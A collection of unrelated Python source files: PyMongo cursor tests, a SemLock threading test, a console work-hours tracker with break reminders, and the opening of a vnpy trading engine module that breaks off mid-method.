self.db.test.find().limit(10).skip(40)[20:]): self.assertEqual(a, b['i']) self.assertEqual(1, len(list(self.db.test.find()[:1]))) self.assertEqual(5, len(list(self.db.test.find()[:5]))) self.assertEqual(1, len(list(self.db.test.find()[99:100]))) self.assertEqual(1, len(list(self.db.test.find()[99:1000]))) self.assertEqual(0, len(list(self.db.test.find()[10:10]))) self.assertEqual(0, len(list(self.db.test.find()[:0]))) self.assertEqual(80, len(list(self.db.test.find()[10:10].limit(0).skip(20)) ) ) self.assertRaises(IndexError, lambda: self.db.test.find()[10:8]) def test_getitem_numeric_index(self): self.db.drop_collection("test") self.db.test.insert_many([{"i": i} for i in range(100)]) self.assertEqual(0, self.db.test.find()[0]['i']) self.assertEqual(50, self.db.test.find()[50]['i']) self.assertEqual(50, self.db.test.find().skip(50)[0]['i']) self.assertEqual(50, self.db.test.find().skip(49)[1]['i']) self.assertEqual(50, self.db.test.find()[50]['i']) self.assertEqual(99, self.db.test.find()[99]['i']) self.assertRaises(IndexError, lambda x: self.db.test.find()[x], -1) self.assertRaises(IndexError, lambda x: self.db.test.find()[x], 100) self.assertRaises(IndexError, lambda x: self.db.test.find().skip(50)[x], 50) @ignore_deprecations def test_count_with_limit_and_skip(self): self.assertRaises(TypeError, self.db.test.find().count, "foo") def check_len(cursor, length): self.assertEqual(len(list(cursor)), cursor.count(True)) self.assertEqual(length, cursor.count(True)) self.db.drop_collection("test") self.db.test.insert_many([{"i": i} for i in range(100)]) check_len(self.db.test.find(), 100) check_len(self.db.test.find().limit(10), 10) check_len(self.db.test.find().limit(110), 100) check_len(self.db.test.find().skip(10), 90) check_len(self.db.test.find().skip(110), 0) check_len(self.db.test.find().limit(10).skip(10), 10) check_len(self.db.test.find()[10:20], 10) check_len(self.db.test.find().limit(10).skip(95), 5) check_len(self.db.test.find()[95:105], 5) def test_len(self): self.assertRaises(TypeError, len, self.db.test.find()) def test_properties(self): self.assertEqual(self.db.test, self.db.test.find().collection) def set_coll(): self.db.test.find().collection = "hello" self.assertRaises(AttributeError, set_coll) def test_get_more(self): db = self.db db.drop_collection("test") db.test.insert_many([{'i': i} for i in range(10)]) self.assertEqual(10, len(list(db.test.find().batch_size(5)))) def test_tailable(self): db = self.db db.drop_collection("test") db.create_collection("test", capped=True, size=1000, max=3) self.addCleanup(db.drop_collection, "test") cursor = db.test.find(cursor_type=CursorType.TAILABLE) db.test.insert_one({"x": 1}) count = 0 for doc in cursor: count += 1 self.assertEqual(1, doc["x"]) self.assertEqual(1, count) db.test.insert_one({"x": 2}) count = 0 for doc in cursor: count += 1 self.assertEqual(2, doc["x"]) self.assertEqual(1, count) db.test.insert_one({"x": 3}) count = 0 for doc in cursor: count += 1 self.assertEqual(3, doc["x"]) self.assertEqual(1, count) # Capped rollover - the collection can never # have more than 3 documents. Just make sure # this doesn't raise... db.test.insert_many([{"x": i} for i in range(4, 7)]) self.assertEqual(0, len(list(cursor))) # and that the cursor doesn't think it's still alive. self.assertFalse(cursor.alive) self.assertEqual(3, db.test.count_documents({})) # __getitem__(index) for cursor in (db.test.find(cursor_type=CursorType.TAILABLE), db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)): self.assertEqual(4, cursor[0]["x"]) self.assertEqual(5, cursor[1]["x"]) self.assertEqual(6, cursor[2]["x"]) cursor.rewind() self.assertEqual([4], [doc["x"] for doc in cursor[0:1]]) cursor.rewind() self.assertEqual([5], [doc["x"] for doc in cursor[1:2]]) cursor.rewind() self.assertEqual([6], [doc["x"] for doc in cursor[2:3]]) cursor.rewind() self.assertEqual([4, 5], [doc["x"] for doc in cursor[0:2]]) cursor.rewind() self.assertEqual([5, 6], [doc["x"] for doc in cursor[1:3]]) cursor.rewind() self.assertEqual([4, 5, 6], [doc["x"] for doc in cursor[0:3]]) def test_concurrent_close(self): """Ensure a tailable can be closed from another thread.""" db = self.db db.drop_collection("test") db.create_collection("test", capped=True, size=1000, max=3) self.addCleanup(db.drop_collection, "test") cursor = db.test.find(cursor_type=CursorType.TAILABLE) def iterate_cursor(): while cursor.alive: for doc in cursor: pass t = threading.Thread(target=iterate_cursor) t.start() time.sleep(1) cursor.close() self.assertFalse(cursor.alive) t.join(3) self.assertFalse(t.is_alive()) def test_distinct(self): self.db.drop_collection("test") self.db.test.insert_many( [{"a": 1}, {"a": 2}, {"a": 2}, {"a": 2}, {"a": 3}]) distinct = self.db.test.find({"a": {"$lt": 3}}).distinct("a") distinct.sort() self.assertEqual([1, 2], distinct) self.db.drop_collection("test") self.db.test.insert_one({"a": {"b": "a"}, "c": 12}) self.db.test.insert_one({"a": {"b": "b"}, "c": 8}) self.db.test.insert_one({"a": {"b": "c"}, "c": 12}) self.db.test.insert_one({"a": {"b": "c"}, "c": 8}) distinct = self.db.test.find({"c": 8}).distinct("a.b") distinct.sort() self.assertEqual(["b", "c"], distinct) @client_context.require_version_max(4, 1, 0, -1) def test_max_scan(self): self.db.drop_collection("test") self.db.test.insert_many([{} for _ in range(100)]) self.assertEqual(100, len(list(self.db.test.find()))) self.assertEqual(50, len(list(self.db.test.find().max_scan(50)))) self.assertEqual(50, len(list(self.db.test.find() .max_scan(90).max_scan(50)))) def test_with_statement(self): self.db.drop_collection("test") self.db.test.insert_many([{} for _ in range(100)]) c1 = self.db.test.find() with self.db.test.find() as c2: self.assertTrue(c2.alive) self.assertFalse(c2.alive) with self.db.test.find() as c2: self.assertEqual(100, len(list(c2))) self.assertFalse(c2.alive) self.assertTrue(c1.alive) @client_context.require_no_mongos @ignore_deprecations def test_comment(self): # MongoDB 3.1.5 changed the ns for commands. regex = {'$regex': r'pymongo_test.(\$cmd|test)'} if client_context.version.at_least(3, 5, 8, -1): query_key = "command.comment" elif client_context.version.at_least(3, 1, 8, -1): query_key = "query.comment" else: query_key = "query.$comment" self.client.drop_database(self.db) self.db.set_profiling_level(ALL) try: list(self.db.test.find().comment('foo')) op = self.db.system.profile.find({'ns': 'pymongo_test.test', 'op': 'query', query_key: 'foo'}) self.assertEqual(op.count(), 1) self.db.test.find().comment('foo').count() op = self.db.system.profile.find({'ns': regex, 'op': 'command', 'command.count': 'test', 'command.comment': 'foo'}) self.assertEqual(op.count(), 1) self.db.test.find().comment('foo').distinct('type') op = self.db.system.profile.find({'ns': regex, 'op': 'command', 'command.distinct': 'test', 'command.comment': 'foo'}) self.assertEqual(op.count(), 1) finally: self.db.set_profiling_level(OFF) self.db.system.profile.drop() self.db.test.insert_many([{}, {}]) cursor = self.db.test.find() next(cursor) self.assertRaises(InvalidOperation, cursor.comment, 'hello') def test_modifiers(self): c = self.db.test # "modifiers" is deprecated. with ignore_deprecations(): cur = c.find() self.assertTrue('$query' not in cur._Cursor__query_spec()) cur = c.find().comment("testing").max_time_ms(500) self.assertTrue('$query' in cur._Cursor__query_spec()) self.assertEqual(cur._Cursor__query_spec()["$comment"], "testing") self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 500) cur = c.find( modifiers={"$maxTimeMS": 500, "$comment": "testing"}) self.assertTrue('$query' in cur._Cursor__query_spec()) self.assertEqual(cur._Cursor__query_spec()["$comment"], "testing") self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 500) # Keyword arg overwrites modifier. # If we remove the "modifiers" arg, delete this test after checking # that TestCommandMonitoring.test_find_options covers all cases. cur = c.find(comment="hi", modifiers={"$comment": "bye"}) self.assertEqual(cur._Cursor__query_spec()["$comment"], "hi") cur = c.find(max_scan=1, modifiers={"$maxScan": 2}) self.assertEqual(cur._Cursor__query_spec()["$maxScan"], 1) cur = c.find(max_time_ms=1, modifiers={"$maxTimeMS": 2}) self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 1) cur = c.find(min=1, modifiers={"$min": 2}) self.assertEqual(cur._Cursor__query_spec()["$min"], 1) cur = c.find(max=1, modifiers={"$max": 2}) self.assertEqual(cur._Cursor__query_spec()["$max"], 1) cur = c.find(return_key=True, modifiers={"$returnKey": False}) self.assertEqual(cur._Cursor__query_spec()["$returnKey"], True) cur = c.find(hint=[("a", 1)], modifiers={"$hint": {"b": "1"}}) self.assertEqual(cur._Cursor__query_spec()["$hint"], {"a": 1}) # The arg is named show_record_id after the "find" command arg, the # modifier is named $showDiskLoc for the OP_QUERY modifier. It's # stored as $showDiskLoc then upgraded to showRecordId if we send a # "find" command. cur = c.find(show_record_id=True, modifiers={"$showDiskLoc": False}) self.assertEqual(cur._Cursor__query_spec()["$showDiskLoc"], True) if not client_context.version.at_least(3, 7, 3): cur = c.find(snapshot=True, modifiers={"$snapshot": False}) self.assertEqual(cur._Cursor__query_spec()["$snapshot"], True) def test_alive(self): self.db.test.delete_many({}) self.db.test.insert_many([{} for _ in range(3)]) self.addCleanup(self.db.test.delete_many, {}) cursor = self.db.test.find().batch_size(2) n = 0 while True: cursor.next() n += 1 if 3 == n: self.assertFalse(cursor.alive) break self.assertTrue(cursor.alive) def test_close_kills_cursor_synchronously(self): # Kill any cursors possibly queued up by previous tests. gc.collect() self.client._process_periodic_tasks() listener = WhiteListEventListener("killCursors") results = listener.results client = rs_or_single_client(event_listeners=[listener]) self.addCleanup(client.close) coll = client[self.db.name].test_close_kills_cursors # Add some test data. docs_inserted = 1000 coll.insert_many([{"i": i} for i in range(docs_inserted)]) results.clear() # Close a cursor while it's still open on the server. cursor = coll.find().batch_size(10) self.assertTrue(bool(next(cursor))) self.assertLess(cursor.retrieved, docs_inserted) cursor.close() def assertCursorKilled(): self.assertEqual(1, len(results["started"])) self.assertEqual("killCursors", results["started"][0].command_name) self.assertEqual(1, len(results["succeeded"])) self.assertEqual("killCursors", results["succeeded"][0].command_name) assertCursorKilled() results.clear() # Close a command cursor while it's still open on the server. cursor = coll.aggregate([], batchSize=10) self.assertTrue(bool(next(cursor))) cursor.close() # The cursor should be killed if it had a non-zero id. if cursor.cursor_id: assertCursorKilled() else: self.assertEqual(0, len(results["started"])) def test_delete_not_initialized(self): # Creating a cursor with invalid arguments will not run __init__ # but will still call __del__, eg test.find(invalidKwarg=1). cursor = Cursor.__new__(Cursor) # Skip calling __init__ cursor.__del__() # no error @client_context.require_version_min(3, 6) def test_getMore_does_not_send_readPreference(self): listener = WhiteListEventListener('find', 'getMore') client = rs_or_single_client( event_listeners=[listener]) self.addCleanup(client.close) coll = client[self.db.name].test coll.delete_many({}) coll.insert_many([{} for _ in range(5)]) self.addCleanup(coll.drop) list(coll.find(batch_size=3)) started = listener.results['started'] self.assertEqual(2, len(started)) self.assertEqual('find', started[0].command_name) self.assertIn('$readPreference', started[0].command) self.assertEqual('getMore', started[1].command_name) self.assertNotIn('$readPreference', started[1].command) class TestRawBatchCursor(IntegrationTest): def test_find_raw(self): c = self.db.test c.drop() docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)] c.insert_many(docs) batches = list(c.find_raw_batches().sort('_id')) self.assertEqual(1, len(batches)) self.assertEqual(docs, decode_all(batches[0])) def test_explain(self): c = self.db.test c.insert_one({}) explanation = c.find_raw_batches().explain() self.assertIsInstance(explanation, dict) def test_clone(self): cursor = self.db.test.find_raw_batches() # Copy of a RawBatchCursor is also a RawBatchCursor, not a Cursor. self.assertIsInstance(next(cursor.clone()), bytes) self.assertIsInstance(next(copy.copy(cursor)), bytes) @client_context.require_no_mongos def test_exhaust(self): c = self.db.test c.drop() c.insert_many({'_id': i} for i in range(200)) result = b''.join(c.find_raw_batches(cursor_type=CursorType.EXHAUST)) self.assertEqual([{'_id': i} for i in range(200)], decode_all(result)) def test_server_error(self): with self.assertRaises(OperationFailure) as exc: next(self.db.test.find_raw_batches({'x': {'$bad': 1}})) # The server response was decoded, not left raw. self.assertIsInstance(exc.exception.details, dict) def test_get_item(self): with self.assertRaises(InvalidOperation): self.db.test.find_raw_batches()[0] @client_context.require_version_min(3, 4) def test_collation(self): next(self.db.test.find_raw_batches(collation=Collation('en_US'))) @client_context.require_version_max(3, 2) def test_collation_error(self): with self.assertRaises(ConfigurationError): next(self.db.test.find_raw_batches(collation=Collation('en_US'))) @client_context.require_version_min(3, 2) def test_read_concern(self): c = self.db.get_collection("test", read_concern=ReadConcern("majority")) next(c.find_raw_batches()) @client_context.require_version_max(3, 1) def test_read_concern_error(self): c = self.db.get_collection("test", read_concern=ReadConcern("majority")) with self.assertRaises(ConfigurationError): next(c.find_raw_batches()) def test_monitoring(self): listener = EventListener() client = rs_or_single_client(event_listeners=[listener]) c = client.pymongo_test.test c.drop() c.insert_many([{'_id': i} for i in range(10)]) listener.results.clear() cursor = c.find_raw_batches(batch_size=4) # First raw batch of 4 documents. next(cursor) started = listener.results['started'][0] succeeded = listener.results['succeeded'][0] self.assertEqual(0, len(listener.results['failed'])) self.assertEqual('find', started.command_name) self.assertEqual('pymongo_test', started.database_name) self.assertEqual('find', succeeded.command_name) csr = succeeded.reply["cursor"] self.assertEqual(csr["ns"], "pymongo_test.test") # The batch is a list of one raw bytes object. self.assertEqual(len(csr["firstBatch"]), 1) self.assertEqual(decode_all(csr["firstBatch"][0]), [{'_id': i} for i in range(0, 4)]) listener.results.clear() # Next raw batch of 4 documents. next(cursor) try: results = listener.results started = results['started'][0] succeeded = results['succeeded'][0] self.assertEqual(0, len(results['failed'])) self.assertEqual('getMore', started.command_name) self.assertEqual('pymongo_test', started.database_name) self.assertEqual('getMore', succeeded.command_name) csr = succeeded.reply["cursor"] self.assertEqual(csr["ns"], "pymongo_test.test") self.assertEqual(len(csr["nextBatch"]), 1) self.assertEqual(decode_all(csr["nextBatch"][0]), [{'_id': i} for i in range(4, 8)]) finally: # Finish the cursor. tuple(cursor) class TestRawBatchCommandCursor(IntegrationTest): @classmethod def setUpClass(cls): super(TestRawBatchCommandCursor, cls).setUpClass() def test_aggregate_raw(self): c = self.db.test c.drop() docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)] c.insert_many(docs) batches = list(c.aggregate_raw_batches([{'$sort': {'_id': 1}}])) self.assertEqual(1, len(batches)) self.assertEqual(docs, decode_all(batches[0])) def test_server_error(self): c = self.db.test c.drop() docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)] c.insert_many(docs) c.insert_one({'_id': 10, 'x': 'not a number'}) with self.assertRaises(OperationFailure) as exc: list(self.db.test.aggregate_raw_batches([{ '$sort': {'_id': 1}, }, { '$project': {'x': {'$multiply': [2, '$x']}} }], batchSize=4)) # The server response was decoded, not left raw. self.assertIsInstance(exc.exception.details, dict) def test_get_item(self): with self.assertRaises(InvalidOperation): self.db.test.aggregate_raw_batches([])[0] @client_context.require_version_min(3, 4) def test_collation(self): next(self.db.test.aggregate_raw_batches([], collation=Collation('en_US'))) @client_context.require_version_max(3, 2) def test_collation_error(self): with self.assertRaises(ConfigurationError): next(self.db.test.aggregate_raw_batches([], collation=Collation('en_US'))) def test_monitoring(self): listener = EventListener() client = rs_or_single_client(event_listeners=[listener]) c = client.pymongo_test.test c.drop() c.insert_many([{'_id': i} for i in range(10)]) listener.results.clear() cursor = c.aggregate_raw_batches([{'$sort': {'_id': 1}}], batchSize=4) # Start cursor, no initial batch. started = listener.results['started'][0] succeeded = listener.results['succeeded'][0] self.assertEqual(0, len(listener.results['failed'])) self.assertEqual('aggregate', started.command_name) self.assertEqual('pymongo_test', started.database_name) self.assertEqual('aggregate', succeeded.command_name) csr = succeeded.reply["cursor"] self.assertEqual(csr["ns"], "pymongo_test.test") # First batch is empty. self.assertEqual(len(csr["firstBatch"]), 0) listener.results.clear() # Batches of 4 documents. n = 0 for batch in cursor: results = listener.results started = results['started'][0] succeeded = results['succeeded'][0] self.assertEqual(0, len(results['failed'])) self.assertEqual('getMore', started.command_name) self.assertEqual('pymongo_test', started.database_name) self.assertEqual('getMore', succeeded.command_name) csr = succeeded.reply["cursor"] self.assertEqual(csr["ns"], "pymongo_test.test") self.assertEqual(len(csr["nextBatch"]), 1) self.assertEqual(csr["nextBatch"][0], batch) self.assertEqual(decode_all(batch), [{'_id': i} for i in range(n, min(n + 4, 10))]) n += 4 listener.results.clear() if __name__ == "__main__": unittest.main()
test_semlock.py
from _multiprocessing import SemLock from threading import Thread import thread import time import sys import pytest @pytest.mark.skipif(sys.platform=='win32', reason='segfaults on win32') def test_notify_all(): """A low-level variation on test_notify_all() in lib-python's test_multiprocessing.py """ N_THREADS = 1000 lock = SemLock(0, 1, 1) results = [] def f(n): if lock.acquire(timeout=5.): results.append(n) lock.release() else: print("lock acquire timed out!") threads = [Thread(target=f, args=(i,)) for i in range(N_THREADS)] n_started = N_THREADS with lock: for t in threads: try: t.start() except thread.error: # too many threads for this system t.started = False n_started -= 1 else: t.started = True time.sleep(0.1) print("started %d threads" % n_started) for t in threads: if t.started: t.join() assert len(results) == n_started
main.py
# import modules try : import os import configparser import time as tm from datetime import * import json import prettytable import easygui import threading except : myassert( False, "Could not import some modules. Use \'pip install <module>\' to install them", True ) # import internal modules from Menu import * from Utils import * # reading config and database files globally, as its required for all functions config = configparser.ConfigParser() config.read('config.ini') dbfile = open( config['DEFAULT']['TIMEDB'], 'r' ) timedb = json.loads( dbfile.read() ) dbfile.close() # Global variables th_sed = None stop_sed = False # write to database file def savedb() : file = open( config['DEFAULT']['TIMEDB'], 'w' ) file.write( json.dumps(timedb, indent=4) ) file.close() # display the current statistics def show_stats(wk=None) : global config global timedb # prepare table for current week data table = prettytable.PrettyTable(["Date", "Day", "Work Day", "Duration"]) if wk is None : ( _, curweek, _) = datetime.today().isocalendar() else : curweek = wk # calculate deficit hours ndays = 0 acttd = timedelta(0) flgTimerStarted = False for entry in timedb : # calculate number of working days ndays += entry['workday'] # calculate total td = timedelta(0) for tim in entry['timestamps'] : (h, m, s) = tim['start'].split(":") start = datetime.combine(date.today(), time(int(h),int(m),int(s))) if tim['end'] is not None : (h, m, s) = tim['end'].split(":") end = datetime.combine(date.today(), time(int(h),int(m),int(s))) td += (end - start) else : flgTimerStarted = True end = datetime.today() td += (end - start) acttd = acttd + td + timedelta( minutes = entry['correction'] ) # collect data for current week (y, mm, s) = entry['date'].split("-") dat = datetime( int(y), int(mm), int(s) ) ( _, week, _) = dat.isocalendar() if week == curweek : hrs = td.seconds/3600 hrs += ( int(entry['correction']) / 60 ) table.add_row( [ entry['date'], dat.strftime("%a"), entry['workday'], f"{hrs:.2f}" ] ) exphrs = ( ndays * float( config['DEFAULT']['DAILYEFFORT'] ) ) + float( config['DEFAULT']['CARRYDEFICIT'] ) acthrs = acttd.total_seconds()/3600 defhrs = exphrs - acthrs clearscr() print(table) print(f"Deficit hours: {defhrs:.2f}") print(f"Timer running: {flgTimerStarted}") def start_timer() : global config global timedb # modify contents tod = datetime.today().strftime("%Y-%m-%d") idx = None flgTimerStarted = False for i in range( len(timedb) ) : if tod == timedb[i]['date'] : idx = i # Check if timer is already started for timestamp in timedb[i]['timestamps'] : if timestamp['start'] is not None and timestamp['end'] is None : flgTimerStarted = True break break if idx is None : datentry = { "date": tod, "workday": 1, "timestamps": [], "correction" : 0 } idx = len(timedb) timedb.append(datentry) if not flgTimerStarted : timentry = { "start": datetime.now().strftime("%H:%M:%S"), "end": None } timedb[idx]['timestamps'].append(timentry) # start sedentary timer if not started global th_sed if not th_sed.is_alive() : print( "Timer is not running" ) th_sed = threading.Thread( target=sed_timer, daemon=True ) global stop_sed stop_sed = False th_sed.start() # write back savedb() show_menu() def stop_timer() : global config global timedb # modify contents tod = datetime.today().strftime("%Y-%m-%d") for i in range( len(timedb) ) : if tod == timedb[i]['date'] : for j in range( len(timedb[i]['timestamps']) ) : if timedb[i]['timestamps'][j]['end'] is None : timedb[i]['timestamps'][j]['end'] = datetime.now().strftime("%H:%M:%S") break break # stop sedentary timer global stop_sed stop_sed = True # write back savedb() show_menu() def add_correction() : global config global timedb cor = input( "Enter mins to add: " ) tod = datetime.today().strftime("%Y-%m-%d") for i in range( len(timedb) ) : if tod == timedb[i]['date'] : timedb[i]['correction'] += int(cor) savedb() show_menu() def mark_day() : global config global timedb # find entry to modify curweek = datetime.today().strftime("%W") menu = Menu(show_stats) for i in range( len(timedb) ) : dat = date.fromisoformat( timedb[i]['date'] ) week = dat.strftime("%W") if(week == curweek) : menu.add( MenuItem( timedb[i]['date'] ) ) idx = menu.show() # get new value and write val = float( input( "Enter new value (0, 0.5, 1) : ") ) for i in range( len(timedb) ) : if menu.getstr(idx-1) == timedb[i]['date'] : timedb[i]['workday'] = val # save and show menu savedb() show_menu() def show_prev_stats() : global config global timedb menu = Menu(show_menu) menu.add( MenuItem("Prev") ) menu.add( MenuItem("Next") ) week = int( datetime.today().strftime("%W") ) - 1 while( week > 0 ) : show_stats(week) ret = menu.show() if ret == 1 : week -= 1 elif ret == 2 : week += 1 def show_menu() : show_stats() menu = Menu() menu.add( MenuItem( "Start Timer", start_timer ) ) menu.add( MenuItem( "Stop Timer", stop_timer ) ) menu.add( MenuItem( "Refresh", show_menu ) ) menu.add( MenuItem( "Time Correction", add_correction ) ) menu.add( MenuItem( "Mark holiday / half day", mark_day ) ) menu.add( MenuItem( "Show previous records", show_prev_stats ) ) while True: menu.show() def sed_timer() : init = int(config['DEFAULT']['SEDMINS']) eta = timedelta( minutes=init ) while not stop_sed : tm.sleep(1) eta -= timedelta(seconds=1) if eta.total_seconds() <= 0 : easygui.msgbox( "Time to take a walk" ) eta = timedelta( minutes=init ) def main() : th_main = threading.Thread( target=show_menu ) th_main.start() global th_sed th_sed = threading.Thread( target=sed_timer, daemon=True ) th_sed.start() th_main.join() if __name__ == "__main__": try : main() except (SystemExit, KeyboardInterrupt) as e : pass except: myassert( False, "An exception has occurred.", True )
engine.py
""" """ import logging from logging import Logger import smtplib import os from abc import ABC from datetime import datetime from email.message import EmailMessage from queue import Empty, Queue from threading import Thread from typing import Any, Sequence, Type, Dict, List, Optional from vnpy.event import Event, EventEngine from .app import BaseApp from .event import ( EVENT_TICK, EVENT_ORDER, EVENT_TRADE, EVENT_POSITION, EVENT_ACCOUNT, EVENT_CONTRACT, EVENT_LOG ) from .gateway import BaseGateway from .object import ( CancelRequest, LogData, OrderRequest, SubscribeRequest, HistoryRequest, OrderData, BarData, TickData, TradeData, PositionData, AccountData, ContractData, Exchange ) from .setting import SETTINGS from .utility import get_folder_path, TRADER_DIR class MainEngine: """ Acts as the core of VN Trader. """ def __init__(self, event_engine: EventEngine = None): """""" if event_engine: self.event_engine: EventEngine = event_engine else: self.event_engine = EventEngine() self.event_engine.start() self.gateways: Dict[str, BaseGateway] = {} self.engines: Dict[str, BaseEngine] = {} self.apps: Dict[str, BaseApp] = {} self.exchanges: List[Exchange] = [] os.chdir(TRADER_DIR) # Change working directory self.init_engines() # Initialize function engines def add_engine(self, engine_class: Any) -> "BaseEngine": """ Add function engine. """ engine = engine_class(self, self.event_engine) self.engines[engine.engine_name] = engine return engine def add_gateway(self, gateway_class: Type[BaseGateway]) -> BaseGateway: """ Add gateway. """ gateway = gateway_class(self.event_engine) self.gateways[gateway.gateway_name] = gateway # Add gateway supported exchanges into engine for exchange in gateway.exchanges: if exchange not in self.exchanges: self.exchanges.append(exchange) return gateway def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine": """ Add app. """ app = app_class() self.apps[app.app_name] = app engine = self.add_engine(app.engine_class) return engine def init_engines(self) -> None: """ Init all engines. """ self.add_engine(LogEngine) self.add_engine(OmsEngine) self.add_engine(EmailEngine) def write_log(self, msg: str, source: str = "") -> None: """ Put log event with specific message. """ log = LogData(msg=msg, gateway_name=source) event = Event(EVENT_LOG, log) self.event_engine.put(event) def get_gateway(self, gateway_name: str) -> BaseGateway: """ Return gateway object by name. """ gateway = self.gateways.get(gateway_name, None) if not gateway: self.write_log(f"ๆ‰พไธๅˆฐๅบ•ๅฑ‚ๆŽฅๅฃ๏ผš{gateway_name}") return gateway def get_engine(self, engine_name: str) -> "BaseEngine": """ Return engine object by name. """ engine = self.engines.get(engine_name, None) if not engine: self.write_log(f"ๆ‰พไธๅˆฐๅผ•ๆ“Ž๏ผš{engine_name}") return engine def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]: """ Get default setting dict of a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: return gateway.get_default_setting() return None def get_all_gateway_names(self) -> List[str]: """ Get all names of gatewasy added in main engine. """ return list(self.gateways.keys()) def get_all_apps(self) -> List[BaseApp]: """ Get all app objects. """ return list(self.apps.values()) def get_all_exchanges(self) -> List[Exchange]: """ Get all exchanges. """ return self.exchanges def connect(self, setting: dict, gateway_name: str) -> None: """ Start connection of a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: gateway.connect(setting) def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None: """ Subscribe tick data update of a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: gateway.subscribe(req) def send_order(self, req: OrderRequest, gateway_name: str) -> str: """ Send new order request to a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: return gateway.send_order(req) else: return "" def cancel_order(self, req: CancelRequest, gateway_name: str) -> None: """ Send cancel order request to a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: gateway.cancel_order(req) def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]: """ """ gateway = self.get_gateway(gateway_name) if gateway: return gateway.send_orders(reqs) else: return ["" for req in reqs] def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None: """ """ gateway = self.get_gateway(gateway_name) if gateway: gateway.cancel_orders(reqs) def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]: """ Send cancel order request to a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: return gateway.query_history(req) else: return None def close(self) -> None: """ Make sure every gateway and app is closed properly before programme exit. """ # Stop event engine first to prevent new timer event. self.event_engine.stop() for engine in self.engines.values(): engine.close() for gateway in self.gateways.values(): gateway.close() class BaseEngine(ABC): """ Abstract class for implementing an function engine. """ def __init__( self, main_engine: MainEngine, event_engine: EventEngine, engine_name: str, ): """""" self.main_engine = main_engine self.event_engine = event_engine self.engine_name = engine_name def close(self): """""" pass class LogEngine(BaseEngine): """ Processes log event and output with logging module. """ def __init__(self, main_engine: MainEngine, event_engine: EventEngine): """""" super(LogEngine, self).__init__(main_engine, event_engine, "log") if not SETTINGS["log.active"]: return self.level: int = SETTINGS["log.level"] self.logger: Logger = logging.getLogger("VN Trader") self.logger.setLevel(self.level) self.formatter = logging.Formatter( "%(asctime)s %(levelname)s: %(message)s" ) self.add_null_handler() if SETTINGS["log.console"]: self.add_console_handler() if SETTINGS["log.file"]: self.add_file_handler() self.register_event() def add_null_handler(self) -> None: """ Add null handler for logger. """ null_handler = logging.NullHandler() self.logger.addHandler(null_handler) def add_console_handler(self) -> None: """ Add console output of log. """ console_handler = logging.StreamHandler() console_handler.setLevel(self.level) console_handler.setFormatter(self.formatter) self.logger.addHandler(console_handler) def add_file_handler(self) -> None: """ Add file output of log. """ today_date = datetime.now().strftime("%Y%m%d") filename = f"vt_{today_date}.log" log_path = get_folder_path("log") file_path = log_path.joinpath(filename) file_handler = logging.FileHandler( file_path, mode="a", encoding="utf8" ) file_handler.setLevel(self.level) file_handler.setFormatter(self.formatter) self.logger.addHandler(file_handler) def register_event(self) -> None: """""" self.event_engine.register(EVENT_LOG, self.process_log_event) def process_log_event(self, event: Event) -> None: """ Process log event. """ log = event.data self.logger.log(log.level, log.msg) class OmsEngine(BaseEngine): """ Provides order management system function for VN Trader. """ def __init__(self, main_engine: MainEngine, event_engine: EventEngine): """""" super(OmsEngine, self).__init__(main_engine, event_engine, "oms") self.ticks: Dict[str, TickData] = {} self.orders: Dict[str, OrderData] = {} self.trades: Dict[str, TradeData] = {} self.positions: Dict[str, PositionData] = {} self.accounts: Dict[str, AccountData] = {} self.contracts: Dict[str, ContractData] = {} self.active_orders: Dict[str, OrderData] = {} self.add_function() self.register_event() def add_function(self) -> None: """Add query function to main engine.""" self.main_engine.get_tick = self.get_tick self.main_engine.get_order = self.get_order self.main_engine.get_trade = self.get_trade self.main_engine.get_position = self.get_position self.main_engine.get_account = self.get_account self.main_engine.get_contract = self.get_contract self.main_engine.get_all_ticks = self.get_all_ticks self.main_engine.get_all_orders = self.get_all_orders self.main_engine.get_all_trades = self.get_all_trades self.main_engine.get_all_positions = self.get_all_positions self.main_engine.get_all_accounts = self.get_all_accounts self.main_engine.get_all_contracts = self.get_all_contracts self.main_engine.get_all_active_orders = self.get_all_active_orders def register_event(self) -> None: """""" self.event_engine.register(EVENT_TICK, self.process_tick_event) self.event_engine.register(EVENT_ORDER, self.process_order_event) self.event_engine.register(EVENT_TRADE, self.process_trade_event) self.event_engine.register(EVENT_POSITION, self.process_position_event) self.event_engine.register(EVENT_ACCOUNT, self.process_account_event) self.event_engine.register(EVENT_CONTRACT, self.process_contract_event) def process_tick_event(self, event: Event) -> None: """""" tick = event.data self.ticks[tick.vt_symbol] = tick def process_order_event(self, event: Event) -> None: """""" order = event.data self.orders[order.vt_orderid] = order # If order is active, then update data in dict. if order.is_active(): self.active_orders[order.vt_orderid] = order # Otherwise, pop inactive order from in dict elif order.vt_orderid in self.active_orders: self.active_orders.pop(order.vt_orderid) def process_trade_event(self, event: Event) -> None: """""" trade = event.data self.trades[trade.vt_tradeid] = trade def process_position_event(self, event: Event) -> None: """""" position = event.data self.positions[position.vt_positionid] = position def process_account_event(self, event: Event) -> None: """""" account = event.data self.accounts[account.vt_accountid] = account def process_contract_event(self, event: Event) -> None: """""" contract = event.data self.contracts[contract.vt_symbol] = contract def get_tick(self, vt_symbol: str) -> Optional[TickData]: """ Get latest market tick data by vt_symbol. """ return self.ticks.get(vt_symbol, None) def get_order(self, vt_orderid: str) -> Optional[OrderData]: """ Get latest order data by vt_orderid. """ return self.orders.get(vt_orderid, None) def get_trade(self, vt_tradeid: str) -> Optional[TradeData]: """ Get trade data by vt_tradeid. """ 